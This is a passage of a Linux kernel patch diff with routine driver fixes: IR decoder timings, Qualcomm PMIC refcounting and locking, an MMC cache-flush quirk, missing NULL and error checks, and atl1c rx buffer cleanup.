+diff --git a/drivers/media/rc/ir-sharp-decoder.c b/drivers/media/rc/ir-sharp-decoder.c
+index 3d8488c39c561..3311099cbd573 100644
+--- a/drivers/media/rc/ir-sharp-decoder.c
++++ b/drivers/media/rc/ir-sharp-decoder.c
+@@ -15,7 +15,9 @@
+ #define SHARP_UNIT		40  /* us */
+ #define SHARP_BIT_PULSE		(8    * SHARP_UNIT) /* 320us */
+ #define SHARP_BIT_0_PERIOD	(25   * SHARP_UNIT) /* 1ms (680us space) */
+-#define SHARP_BIT_1_PERIOD	(50   * SHARP_UNIT) /* 2ms (1680ms space) */
++#define SHARP_BIT_1_PERIOD	(50   * SHARP_UNIT) /* 2ms (1680us space) */
++#define SHARP_BIT_0_SPACE	(17   * SHARP_UNIT) /* 680us space */
++#define SHARP_BIT_1_SPACE	(42   * SHARP_UNIT) /* 1680us space */
+ #define SHARP_ECHO_SPACE	(1000 * SHARP_UNIT) /* 40 ms */
+ #define SHARP_TRAILER_SPACE	(125  * SHARP_UNIT) /* 5 ms (even longer) */
+ 
+@@ -168,8 +170,8 @@ static const struct ir_raw_timings_pd ir_sharp_timings = {
+ 	.header_pulse  = 0,
+ 	.header_space  = 0,
+ 	.bit_pulse     = SHARP_BIT_PULSE,
+-	.bit_space[0]  = SHARP_BIT_0_PERIOD,
+-	.bit_space[1]  = SHARP_BIT_1_PERIOD,
++	.bit_space[0]  = SHARP_BIT_0_SPACE,
++	.bit_space[1]  = SHARP_BIT_1_SPACE,
+ 	.trailer_pulse = SHARP_BIT_PULSE,
+ 	.trailer_space = SHARP_ECHO_SPACE,
+ 	.msb_first     = 1,
+diff --git a/drivers/media/rc/lirc_dev.c b/drivers/media/rc/lirc_dev.c
+index 25ab61dae126d..184e0b35744f3 100644
+--- a/drivers/media/rc/lirc_dev.c
++++ b/drivers/media/rc/lirc_dev.c
+@@ -276,7 +276,11 @@ static ssize_t lirc_transmit(struct file *file, const char __user *buf,
+ 		if (ret < 0)
+ 			goto out_kfree_raw;
+ 
+-		count = ret;
++		/* drop trailing space */
++		if (!(ret % 2))
++			count = ret - 1;
++		else
++			count = ret;
+ 
+ 		txbuf = kmalloc_array(count, sizeof(unsigned int), GFP_KERNEL);
+ 		if (!txbuf) {
+diff --git a/drivers/media/test-drivers/vivid/vivid-rds-gen.c b/drivers/media/test-drivers/vivid/vivid-rds-gen.c
+index b5b104ee64c99..c57771119a34b 100644
+--- a/drivers/media/test-drivers/vivid/vivid-rds-gen.c
++++ b/drivers/media/test-drivers/vivid/vivid-rds-gen.c
+@@ -145,7 +145,7 @@ void vivid_rds_gen_fill(struct vivid_rds_gen *rds, unsigned freq,
+ 	rds->ta = alt;
+ 	rds->ms = true;
+ 	snprintf(rds->psname, sizeof(rds->psname), "%6d.%1d",
+-		 freq / 16, ((freq & 0xf) * 10) / 16);
++		 (freq / 16) % 1000000, (((freq & 0xf) * 10) / 16) % 10);
+ 	if (alt)
+ 		strscpy(rds->radiotext,
+ 			" The Radio Data System can switch between different Radio Texts ",
+diff --git a/drivers/media/usb/gspca/cpia1.c b/drivers/media/usb/gspca/cpia1.c
+index 46ed95483e222..5f5fa851ca640 100644
+--- a/drivers/media/usb/gspca/cpia1.c
++++ b/drivers/media/usb/gspca/cpia1.c
+@@ -18,6 +18,7 @@
+ 
+ #include <linux/input.h>
+ #include <linux/sched/signal.h>
++#include <linux/bitops.h>
+ 
+ #include "gspca.h"
+ 
+@@ -1028,6 +1029,8 @@ static int set_flicker(struct gspca_dev *gspca_dev, int on, int apply)
+ 			sd->params.exposure.expMode = 2;
+ 			sd->exposure_status = EXPOSURE_NORMAL;
+ 		}
++		if (sd->params.exposure.gain >= BITS_PER_TYPE(currentexp))
++			return -EINVAL;
+ 		currentexp = currentexp << sd->params.exposure.gain;
+ 		sd->params.exposure.gain = 0;
+ 		/* round down current exposure to nearest value */
+diff --git a/drivers/mfd/intel-lpss-pci.c b/drivers/mfd/intel-lpss-pci.c
+index 699f44ffff0e4..ae5759200622c 100644
+--- a/drivers/mfd/intel-lpss-pci.c
++++ b/drivers/mfd/intel-lpss-pci.c
+@@ -561,6 +561,19 @@ static const struct pci_device_id intel_lpss_pci_ids[] = {
+ 	{ PCI_VDEVICE(INTEL, 0xa3e2), (kernel_ulong_t)&spt_i2c_info },
+ 	{ PCI_VDEVICE(INTEL, 0xa3e3), (kernel_ulong_t)&spt_i2c_info },
+ 	{ PCI_VDEVICE(INTEL, 0xa3e6), (kernel_ulong_t)&spt_uart_info },
++	/* LNL-M */
++	{ PCI_VDEVICE(INTEL, 0xa825), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0xa826), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0xa827), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0xa830), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0xa846), (kernel_ulong_t)&tgl_info },
++	{ PCI_VDEVICE(INTEL, 0xa850), (kernel_ulong_t)&ehl_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0xa851), (kernel_ulong_t)&ehl_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0xa852), (kernel_ulong_t)&bxt_uart_info },
++	{ PCI_VDEVICE(INTEL, 0xa878), (kernel_ulong_t)&ehl_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0xa879), (kernel_ulong_t)&ehl_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0xa87a), (kernel_ulong_t)&ehl_i2c_info },
++	{ PCI_VDEVICE(INTEL, 0xa87b), (kernel_ulong_t)&ehl_i2c_info },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(pci, intel_lpss_pci_ids);
+diff --git a/drivers/mfd/qcom-spmi-pmic.c b/drivers/mfd/qcom-spmi-pmic.c
+index 7e2cd79d17ebf..8e449cff5cec4 100644
+--- a/drivers/mfd/qcom-spmi-pmic.c
++++ b/drivers/mfd/qcom-spmi-pmic.c
+@@ -30,6 +30,8 @@ struct qcom_spmi_dev {
+ 	struct qcom_spmi_pmic pmic;
+ };
+ 
++static DEFINE_MUTEX(pmic_spmi_revid_lock);
++
+ #define N_USIDS(n)		((void *)n)
+ 
+ static const struct of_device_id pmic_spmi_id_table[] = {
+@@ -76,24 +78,21 @@ static const struct of_device_id pmic_spmi_id_table[] = {
+  *
+  * This only supports PMICs with 1 or 2 USIDs.
+  */
+-static struct spmi_device *qcom_pmic_get_base_usid(struct device *dev)
++static struct spmi_device *qcom_pmic_get_base_usid(struct spmi_device *sdev, struct qcom_spmi_dev *ctx)
+ {
+-	struct spmi_device *sdev;
+-	struct qcom_spmi_dev *ctx;
+ 	struct device_node *spmi_bus;
+-	struct device_node *other_usid = NULL;
++	struct device_node *child;
+ 	int function_parent_usid, ret;
+ 	u32 pmic_addr;
+ 
+-	sdev = to_spmi_device(dev);
+-	ctx = dev_get_drvdata(&sdev->dev);
+-
+ 	/*
+ 	 * Quick return if the function device is already in the base
+ 	 * USID. This will always be hit for PMICs with only 1 USID.
+ 	 */
+-	if (sdev->usid % ctx->num_usids == 0)
++	if (sdev->usid % ctx->num_usids == 0) {
++		get_device(&sdev->dev);
+ 		return sdev;
++	}
+ 
+ 	function_parent_usid = sdev->usid;
+ 
+@@ -105,28 +104,61 @@ static struct spmi_device *qcom_pmic_get_base_usid(struct device *dev)
+ 	 * device for USID 2.
+ 	 */
+ 	spmi_bus = of_get_parent(sdev->dev.of_node);
+-	do {
+-		other_usid = of_get_next_child(spmi_bus, other_usid);
+-
+-		ret = of_property_read_u32_index(other_usid, "reg", 0, &pmic_addr);
+-		if (ret)
+-			return ERR_PTR(ret);
++	sdev = ERR_PTR(-ENODATA);
++	for_each_child_of_node(spmi_bus, child) {
++		ret = of_property_read_u32_index(child, "reg", 0, &pmic_addr);
++		if (ret) {
++			of_node_put(child);
++			sdev = ERR_PTR(ret);
++			break;
++		}
+ 
+-		sdev = spmi_device_from_of(other_usid);
+ 		if (pmic_addr == function_parent_usid - (ctx->num_usids - 1)) {
+-			if (!sdev)
++			sdev = spmi_device_from_of(child);
++			if (!sdev) {
+ 				/*
+-				 * If the base USID for this PMIC hasn't probed yet
+-				 * but the secondary USID has, then we need to defer
+-				 * the function driver so that it will attempt to
+-				 * probe again when the base USID is ready.
++				 * If the base USID for this PMIC hasn't been
++				 * registered yet then we need to defer.
+ 				 */
+-				return ERR_PTR(-EPROBE_DEFER);
+-			return sdev;
++				sdev = ERR_PTR(-EPROBE_DEFER);
++			}
++			of_node_put(child);
++			break;
+ 		}
+-	} while (other_usid->sibling);
++	}
+ 
+-	return ERR_PTR(-ENODATA);
++	of_node_put(spmi_bus);
++
++	return sdev;
++}
++
++static int pmic_spmi_get_base_revid(struct spmi_device *sdev, struct qcom_spmi_dev *ctx)
++{
++	struct qcom_spmi_dev *base_ctx;
++	struct spmi_device *base;
++	int ret = 0;
++
++	base = qcom_pmic_get_base_usid(sdev, ctx);
++	if (IS_ERR(base))
++		return PTR_ERR(base);
++
++	/*
++	 * Copy revid info from base device if it has probed and is still
++	 * bound to its driver.
++	 */
++	mutex_lock(&pmic_spmi_revid_lock);
++	base_ctx = spmi_device_get_drvdata(base);
++	if (!base_ctx) {
++		ret = -EPROBE_DEFER;
++		goto out_unlock;
++	}
++	memcpy(&ctx->pmic, &base_ctx->pmic, sizeof(ctx->pmic));
++out_unlock:
++	mutex_unlock(&pmic_spmi_revid_lock);
++
++	put_device(&base->dev);
++
++	return ret;
+ }
+ 
+ static int pmic_spmi_load_revid(struct regmap *map, struct device *dev,
+@@ -204,11 +236,7 @@ const struct qcom_spmi_pmic *qcom_pmic_get(struct device *dev)
+ 	if (!of_match_device(pmic_spmi_id_table, dev->parent))
+ 		return ERR_PTR(-EINVAL);
+ 
+-	sdev = qcom_pmic_get_base_usid(dev->parent);
+-
+-	if (IS_ERR(sdev))
+-		return ERR_CAST(sdev);
+-
++	sdev = to_spmi_device(dev->parent);
+ 	spmi = dev_get_drvdata(&sdev->dev);
+ 
+ 	return &spmi->pmic;
+@@ -243,16 +271,31 @@ static int pmic_spmi_probe(struct spmi_device *sdev)
+ 		ret = pmic_spmi_load_revid(regmap, &sdev->dev, &ctx->pmic);
+ 		if (ret < 0)
+ 			return ret;
++	} else {
++		ret = pmic_spmi_get_base_revid(sdev, ctx);
++		if (ret)
++			return ret;
+ 	}
++
++	mutex_lock(&pmic_spmi_revid_lock);
+ 	spmi_device_set_drvdata(sdev, ctx);
++	mutex_unlock(&pmic_spmi_revid_lock);
+ 
+ 	return devm_of_platform_populate(&sdev->dev);
+ }
+ 
++static void pmic_spmi_remove(struct spmi_device *sdev)
++{
++	mutex_lock(&pmic_spmi_revid_lock);
++	spmi_device_set_drvdata(sdev, NULL);
++	mutex_unlock(&pmic_spmi_revid_lock);
++}
++
+ MODULE_DEVICE_TABLE(of, pmic_spmi_id_table);
+ 
+ static struct spmi_driver pmic_spmi_driver = {
+ 	.probe = pmic_spmi_probe,
++	.remove = pmic_spmi_remove,
+ 	.driver = {
+ 		.name = "pmic-spmi",
+ 		.of_match_table = pmic_spmi_id_table,
+diff --git a/drivers/misc/pci_endpoint_test.c b/drivers/misc/pci_endpoint_test.c
+index 55dc16d8f6adb..18059a12d4e18 100644
+--- a/drivers/misc/pci_endpoint_test.c
++++ b/drivers/misc/pci_endpoint_test.c
+@@ -81,6 +81,7 @@
+ #define PCI_DEVICE_ID_RENESAS_R8A774B1		0x002b
+ #define PCI_DEVICE_ID_RENESAS_R8A774C0		0x002d
+ #define PCI_DEVICE_ID_RENESAS_R8A774E1		0x0025
++#define PCI_DEVICE_ID_RENESAS_R8A779F0		0x0031
+ 
+ static DEFINE_IDA(pci_endpoint_test_ida);
+ 
+@@ -996,6 +997,9 @@ static const struct pci_device_id pci_endpoint_test_tbl[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_RENESAS, PCI_DEVICE_ID_RENESAS_R8A774B1),},
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_RENESAS, PCI_DEVICE_ID_RENESAS_R8A774C0),},
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_RENESAS, PCI_DEVICE_ID_RENESAS_R8A774E1),},
++	{ PCI_DEVICE(PCI_VENDOR_ID_RENESAS, PCI_DEVICE_ID_RENESAS_R8A779F0),
++	  .driver_data = (kernel_ulong_t)&default_data,
++	},
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_TI, PCI_DEVICE_ID_TI_J721E),
+ 	  .driver_data = (kernel_ulong_t)&j721e_data,
+ 	},
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index 1fc6767f18782..67a7ae9b997aa 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -2404,8 +2404,10 @@ enum mmc_issued mmc_blk_mq_issue_rq(struct mmc_queue *mq, struct request *req)
+ 			}
+ 			ret = mmc_blk_cqe_issue_flush(mq, req);
+ 			break;
+-		case REQ_OP_READ:
+ 		case REQ_OP_WRITE:
++			card->written_flag = true;
++			fallthrough;
++		case REQ_OP_READ:
+ 			if (host->cqe_enabled)
+ 				ret = mmc_blk_cqe_issue_rw_rq(mq, req);
+ 			else
+diff --git a/drivers/mmc/core/card.h b/drivers/mmc/core/card.h
+index 4edf9057fa79d..b7754a1b8d978 100644
+--- a/drivers/mmc/core/card.h
++++ b/drivers/mmc/core/card.h
+@@ -280,4 +280,8 @@ static inline int mmc_card_broken_sd_cache(const struct mmc_card *c)
+ 	return c->quirks & MMC_QUIRK_BROKEN_SD_CACHE;
+ }
+ 
++static inline int mmc_card_broken_cache_flush(const struct mmc_card *c)
++{
++	return c->quirks & MMC_QUIRK_BROKEN_CACHE_FLUSH;
++}
+ #endif
+diff --git a/drivers/mmc/core/mmc.c b/drivers/mmc/core/mmc.c
+index 89cd48fcec79f..a46ce0868fe1f 100644
+--- a/drivers/mmc/core/mmc.c
++++ b/drivers/mmc/core/mmc.c
+@@ -2081,13 +2081,17 @@ static int _mmc_flush_cache(struct mmc_host *host)
+ {
+ 	int err = 0;
+ 
++	if (mmc_card_broken_cache_flush(host->card) && !host->card->written_flag)
++		return 0;
++
+ 	if (_mmc_cache_enabled(host)) {
+ 		err = mmc_switch(host->card, EXT_CSD_CMD_SET_NORMAL,
+ 				 EXT_CSD_FLUSH_CACHE, 1,
+ 				 CACHE_FLUSH_TIMEOUT_MS);
+ 		if (err)
+-			pr_err("%s: cache flush error %d\n",
+-			       mmc_hostname(host), err);
++			pr_err("%s: cache flush error %d\n", mmc_hostname(host), err);
++		else
++			host->card->written_flag = false;
+ 	}
+ 
+ 	return err;
+diff --git a/drivers/mmc/core/quirks.h b/drivers/mmc/core/quirks.h
+index 857315f185fcf..ec760ac0b3977 100644
+--- a/drivers/mmc/core/quirks.h
++++ b/drivers/mmc/core/quirks.h
+@@ -117,11 +117,12 @@ static const struct mmc_fixup __maybe_unused mmc_blk_fixups[] = {
+ 		  MMC_QUIRK_TRIM_BROKEN),
+ 
+ 	/*
+-	 * Micron MTFC4GACAJCN-1M advertises TRIM but it does not seems to
+-	 * support being used to offload WRITE_ZEROES.
++	 * Micron MTFC4GACAJCN-1M supports TRIM but does not appear to support
++	 * WRITE_ZEROES offloading. It also supports caching, but the cache can
++	 * only be flushed after a write has occurred.
+ 	 */
+ 	MMC_FIXUP("Q2J54A", CID_MANFID_MICRON, 0x014e, add_quirk_mmc,
+-		  MMC_QUIRK_TRIM_BROKEN),
++		  MMC_QUIRK_TRIM_BROKEN | MMC_QUIRK_BROKEN_CACHE_FLUSH),
+ 
+ 	/*
+ 	 * Some SD cards reports discard support while they don't
+diff --git a/drivers/mmc/host/meson-gx-mmc.c b/drivers/mmc/host/meson-gx-mmc.c
+index 0f39f86bd0c26..7e571cc719605 100644
+--- a/drivers/mmc/host/meson-gx-mmc.c
++++ b/drivers/mmc/host/meson-gx-mmc.c
+@@ -817,7 +817,6 @@ static void meson_mmc_start_cmd(struct mmc_host *mmc, struct mmc_command *cmd)
+ 
+ 	cmd_cfg |= FIELD_PREP(CMD_CFG_CMD_INDEX_MASK, cmd->opcode);
+ 	cmd_cfg |= CMD_CFG_OWNER;  /* owned by CPU */
+-	cmd_cfg |= CMD_CFG_ERROR; /* stop in case of error */
+ 
+ 	meson_mmc_set_response_bits(cmd, &cmd_cfg);
+ 
+diff --git a/drivers/mmc/host/sdhci-pci-gli.c b/drivers/mmc/host/sdhci-pci-gli.c
+index c580ba089a261..33d7039c19169 100644
+--- a/drivers/mmc/host/sdhci-pci-gli.c
++++ b/drivers/mmc/host/sdhci-pci-gli.c
+@@ -24,6 +24,12 @@
+ #define   GLI_9750_WT_EN_ON	    0x1
+ #define   GLI_9750_WT_EN_OFF	    0x0
+ 
++#define PCI_GLI_9750_PM_CTRL	0xFC
++#define   PCI_GLI_9750_PM_STATE	  GENMASK(1, 0)
++
++#define PCI_GLI_9750_CORRERR_MASK				0x214
++#define   PCI_GLI_9750_CORRERR_MASK_REPLAY_TIMER_TIMEOUT	  BIT(12)
++
+ #define SDHCI_GLI_9750_CFG2          0x848
+ #define   SDHCI_GLI_9750_CFG2_L1DLY    GENMASK(28, 24)
+ #define   GLI_9750_CFG2_L1DLY_VALUE    0x1F
+@@ -148,6 +154,9 @@
+ #define PCI_GLI_9755_PM_CTRL     0xFC
+ #define   PCI_GLI_9755_PM_STATE    GENMASK(1, 0)
+ 
++#define PCI_GLI_9755_CORRERR_MASK				0x214
++#define   PCI_GLI_9755_CORRERR_MASK_REPLAY_TIMER_TIMEOUT	  BIT(12)
++
+ #define GLI_MAX_TUNING_LOOP 40
+ 
+ /* Genesys Logic chipset */
+@@ -469,8 +478,12 @@ static void sdhci_gl9750_set_clock(struct sdhci_host *host, unsigned int clock)
+ 
+ static void gl9750_hw_setting(struct sdhci_host *host)
+ {
++	struct sdhci_pci_slot *slot = sdhci_priv(host);
++	struct pci_dev *pdev;
+ 	u32 value;
+ 
++	pdev = slot->chip->pdev;
++
+ 	gl9750_wt_on(host);
+ 
+ 	value = sdhci_readl(host, SDHCI_GLI_9750_CFG2);
+@@ -480,6 +493,18 @@ static void gl9750_hw_setting(struct sdhci_host *host)
+ 			    GLI_9750_CFG2_L1DLY_VALUE);
+ 	sdhci_writel(host, value, SDHCI_GLI_9750_CFG2);
+ 
++	/* toggle PM state to allow GL9750 to enter ASPM L1.2 */
++	pci_read_config_dword(pdev, PCI_GLI_9750_PM_CTRL, &value);
++	value |= PCI_GLI_9750_PM_STATE;
++	pci_write_config_dword(pdev, PCI_GLI_9750_PM_CTRL, value);
++	value &= ~PCI_GLI_9750_PM_STATE;
++	pci_write_config_dword(pdev, PCI_GLI_9750_PM_CTRL, value);
++
++	/* mask the replay timer timeout of AER */
++	pci_read_config_dword(pdev, PCI_GLI_9750_CORRERR_MASK, &value);
++	value |= PCI_GLI_9750_CORRERR_MASK_REPLAY_TIMER_TIMEOUT;
++	pci_write_config_dword(pdev, PCI_GLI_9750_CORRERR_MASK, value);
++
+ 	gl9750_wt_off(host);
+ }
+ 
+@@ -689,6 +714,11 @@ static void gl9755_hw_setting(struct sdhci_pci_slot *slot)
+ 	value &= ~PCI_GLI_9755_PM_STATE;
+ 	pci_write_config_dword(pdev, PCI_GLI_9755_PM_CTRL, value);
+ 
++	/* mask the replay timer timeout of AER */
++	pci_read_config_dword(pdev, PCI_GLI_9755_CORRERR_MASK, &value);
++	value |= PCI_GLI_9755_CORRERR_MASK_REPLAY_TIMER_TIMEOUT;
++	pci_write_config_dword(pdev, PCI_GLI_9755_CORRERR_MASK, value);
++
+ 	gl9755_wt_off(pdev);
+ }
+ 
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index 8e22b375247ef..c16dbe64859e6 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -597,7 +597,7 @@ static int sdhci_am654_get_otap_delay(struct sdhci_host *host,
+ 		return 0;
+ 	}
+ 
+-	for (i = MMC_TIMING_MMC_HS; i <= MMC_TIMING_MMC_HS400; i++) {
++	for (i = MMC_TIMING_LEGACY; i <= MMC_TIMING_MMC_HS400; i++) {
+ 
+ 		ret = device_property_read_u32(dev, td[i].otap_binding,
+ 					       &sdhci_am654->otap_del_sel[i]);
+diff --git a/drivers/mmc/host/vub300.c b/drivers/mmc/host/vub300.c
+index 7dc0e91dabfc7..05ffd5bf5a6f0 100644
+--- a/drivers/mmc/host/vub300.c
++++ b/drivers/mmc/host/vub300.c
+@@ -2311,6 +2311,7 @@ static int vub300_probe(struct usb_interface *interface,
+ 		vub300->read_only =
+ 			(0x0010 & vub300->system_port_status.port_flags) ? 1 : 0;
+ 	} else {
++		retval = -EINVAL;
+ 		goto error5;
+ 	}
+ 	usb_set_intfdata(interface, vub300);
+diff --git a/drivers/mtd/chips/cfi_cmdset_0001.c b/drivers/mtd/chips/cfi_cmdset_0001.c
+index 54f92d09d9cf4..02aaf09d6f5cd 100644
+--- a/drivers/mtd/chips/cfi_cmdset_0001.c
++++ b/drivers/mtd/chips/cfi_cmdset_0001.c
+@@ -421,9 +421,25 @@ read_pri_intelext(struct map_info *map, __u16 adr)
+ 		extra_size = 0;
+ 
+ 		/* Protection Register info */
+-		if (extp->NumProtectionFields)
++		if (extp->NumProtectionFields) {
++			struct cfi_intelext_otpinfo *otp =
++				(struct cfi_intelext_otpinfo *)&extp->extra[0];
++
+ 			extra_size += (extp->NumProtectionFields - 1) *
+-				      sizeof(struct cfi_intelext_otpinfo);
++				sizeof(struct cfi_intelext_otpinfo);
++
++			if (extp_size >= sizeof(*extp) + extra_size) {
++				int i;
++
++				/* Do some byteswapping if necessary */
++				for (i = 0; i < extp->NumProtectionFields - 1; i++) {
++					otp->ProtRegAddr = le32_to_cpu(otp->ProtRegAddr);
++					otp->FactGroups = le16_to_cpu(otp->FactGroups);
++					otp->UserGroups = le16_to_cpu(otp->UserGroups);
++					otp++;
++				}
++			}
++		}
+ 	}
+ 
+ 	if (extp->MinorVersion >= '1') {
+diff --git a/drivers/mtd/nand/raw/intel-nand-controller.c b/drivers/mtd/nand/raw/intel-nand-controller.c
+index 6f4cea81f97c0..1f8a33fb84607 100644
+--- a/drivers/mtd/nand/raw/intel-nand-controller.c
++++ b/drivers/mtd/nand/raw/intel-nand-controller.c
+@@ -619,6 +619,11 @@ static int ebu_nand_probe(struct platform_device *pdev)
+ 	ebu_host->cs_num = cs;
+ 
+ 	resname = devm_kasprintf(dev, GFP_KERNEL, "nand_cs%d", cs);
++	if (!resname) {
++		ret = -ENOMEM;
++		goto err_of_node_put;
++	}
++
+ 	ebu_host->cs[cs].chipaddr = devm_platform_ioremap_resource_byname(pdev,
+ 									  resname);
+ 	if (IS_ERR(ebu_host->cs[cs].chipaddr)) {
+@@ -655,6 +660,11 @@ static int ebu_nand_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	resname = devm_kasprintf(dev, GFP_KERNEL, "addr_sel%d", cs);
++	if (!resname) {
++		ret = -ENOMEM;
++		goto err_cleanup_dma;
++	}
++
+ 	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, resname);
+ 	if (!res) {
+ 		ret = -EINVAL;
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index ac4947f720478..0aeac8ccbd0ee 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -1021,6 +1021,9 @@ static int meson_nfc_clk_init(struct meson_nfc *nfc)
+ 	init.name = devm_kasprintf(nfc->dev,
+ 				   GFP_KERNEL, "%s#div",
+ 				   dev_name(nfc->dev));
++	if (!init.name)
++		return -ENOMEM;
++
+ 	init.ops = &clk_divider_ops;
+ 	nfc_divider_parent_data[0].fw_name = "device";
+ 	init.parent_data = nfc_divider_parent_data;
+diff --git a/drivers/mtd/nand/raw/tegra_nand.c b/drivers/mtd/nand/raw/tegra_nand.c
+index a9b9031ce6167..d33030b68ac44 100644
+--- a/drivers/mtd/nand/raw/tegra_nand.c
++++ b/drivers/mtd/nand/raw/tegra_nand.c
+@@ -1197,6 +1197,10 @@ static int tegra_nand_probe(struct platform_device *pdev)
+ 	init_completion(&ctrl->dma_complete);
+ 
+ 	ctrl->irq = platform_get_irq(pdev, 0);
++	if (ctrl->irq < 0) {
++		err = ctrl->irq;
++		goto err_put_pm;
++	}
+ 	err = devm_request_irq(&pdev->dev, ctrl->irq, tegra_nand_irq, 0,
+ 			       dev_name(&pdev->dev), ctrl);
+ 	if (err) {
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index b170a3d8d007e..710734a5af9bf 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1503,6 +1503,10 @@ done:
+ static void bond_setup_by_slave(struct net_device *bond_dev,
+ 				struct net_device *slave_dev)
+ {
++	bool was_up = !!(bond_dev->flags & IFF_UP);
++
++	dev_close(bond_dev);
++
+ 	bond_dev->header_ops	    = slave_dev->header_ops;
+ 
+ 	bond_dev->type		    = slave_dev->type;
+@@ -1517,6 +1521,8 @@ static void bond_setup_by_slave(struct net_device *bond_dev,
+ 		bond_dev->flags &= ~(IFF_BROADCAST | IFF_MULTICAST);
+ 		bond_dev->flags |= (IFF_POINTOPOINT | IFF_NOARP);
+ 	}
++	if (was_up)
++		dev_open(bond_dev, NULL);
+ }
+ 
+ /* On bonding slaves other than the currently active slave, suppress
+diff --git a/drivers/net/dsa/lan9303_mdio.c b/drivers/net/dsa/lan9303_mdio.c
+index 4f33369a2de52..47484f55e2aba 100644
+--- a/drivers/net/dsa/lan9303_mdio.c
++++ b/drivers/net/dsa/lan9303_mdio.c
+@@ -32,7 +32,7 @@ static int lan9303_mdio_write(void *ctx, uint32_t reg, uint32_t val)
+ 	struct lan9303_mdio *sw_dev = (struct lan9303_mdio *)ctx;
+ 
+ 	reg <<= 2; /* reg num to offset */
+-	mutex_lock(&sw_dev->device->bus->mdio_lock);
++	mutex_lock_nested(&sw_dev->device->bus->mdio_lock, MDIO_MUTEX_NESTED);
+ 	lan9303_mdio_real_write(sw_dev->device, reg, val & 0xffff);
+ 	lan9303_mdio_real_write(sw_dev->device, reg + 2, (val >> 16) & 0xffff);
+ 	mutex_unlock(&sw_dev->device->bus->mdio_lock);
+@@ -50,7 +50,7 @@ static int lan9303_mdio_read(void *ctx, uint32_t reg, uint32_t *val)
+ 	struct lan9303_mdio *sw_dev = (struct lan9303_mdio *)ctx;
+ 
+ 	reg <<= 2; /* reg num to offset */
+-	mutex_lock(&sw_dev->device->bus->mdio_lock);
++	mutex_lock_nested(&sw_dev->device->bus->mdio_lock, MDIO_MUTEX_NESTED);
+ 	*val = lan9303_mdio_real_read(sw_dev->device, reg);
+ 	*val |= (lan9303_mdio_real_read(sw_dev->device, reg + 2) << 16);
+ 	mutex_unlock(&sw_dev->device->bus->mdio_lock);
+diff --git a/drivers/net/ethernet/atheros/atl1c/atl1c.h b/drivers/net/ethernet/atheros/atl1c/atl1c.h
+index 43d821fe7a542..63ba64dbb7310 100644
+--- a/drivers/net/ethernet/atheros/atl1c/atl1c.h
++++ b/drivers/net/ethernet/atheros/atl1c/atl1c.h
+@@ -504,15 +504,12 @@ struct atl1c_rrd_ring {
+ 	u16 next_to_use;
+ 	u16 next_to_clean;
+ 	struct napi_struct napi;
+-	struct page *rx_page;
+-	unsigned int rx_page_offset;
+ };
+ 
+ /* board specific private data structure */
+ struct atl1c_adapter {
+ 	struct net_device   *netdev;
+ 	struct pci_dev      *pdev;
+-	unsigned int	    rx_frag_size;
+ 	struct atl1c_hw        hw;
+ 	struct atl1c_hw_stats  hw_stats;
+ 	struct mii_if_info  mii;    /* MII interface info */
+diff --git a/drivers/net/ethernet/atheros/atl1c/atl1c_main.c b/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
+index 7762e532c6a4f..6eb86d75955fe 100644
+--- a/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
++++ b/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
+@@ -493,15 +493,10 @@ static int atl1c_set_mac_addr(struct net_device *netdev, void *p)
+ static void atl1c_set_rxbufsize(struct atl1c_adapter *adapter,
+ 				struct net_device *dev)
+ {
+-	unsigned int head_size;
+ 	int mtu = dev->mtu;
+ 
+ 	adapter->rx_buffer_len = mtu > AT_RX_BUF_SIZE ?
+ 		roundup(mtu + ETH_HLEN + ETH_FCS_LEN + VLAN_HLEN, 8) : AT_RX_BUF_SIZE;
+-
+-	head_size = SKB_DATA_ALIGN(adapter->rx_buffer_len + NET_SKB_PAD + NET_IP_ALIGN) +
+-		    SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	adapter->rx_frag_size = roundup_pow_of_two(head_size);
+ }
+ 
+ static netdev_features_t atl1c_fix_features(struct net_device *netdev,
+@@ -974,7 +969,6 @@ static void atl1c_init_ring_ptrs(struct atl1c_adapter *adapter)
+ static void atl1c_free_ring_resources(struct atl1c_adapter *adapter)
+ {
+ 	struct pci_dev *pdev = adapter->pdev;
+-	int i;
+ 
+ 	dma_free_coherent(&pdev->dev, adapter->ring_header.size,
+ 			  adapter->ring_header.desc, adapter->ring_header.dma);
+@@ -987,12 +981,6 @@ static void atl1c_free_ring_resources(struct atl1c_adapter *adapter)
+ 		kfree(adapter->tpd_ring[0].buffer_info);
+ 		adapter->tpd_ring[0].buffer_info = NULL;
+ 	}
+-	for (i = 0; i < adapter->rx_queue_count; ++i) {
+-		if (adapter->rrd_ring[i].rx_page) {
+-			put_page(adapter->rrd_ring[i].rx_page);
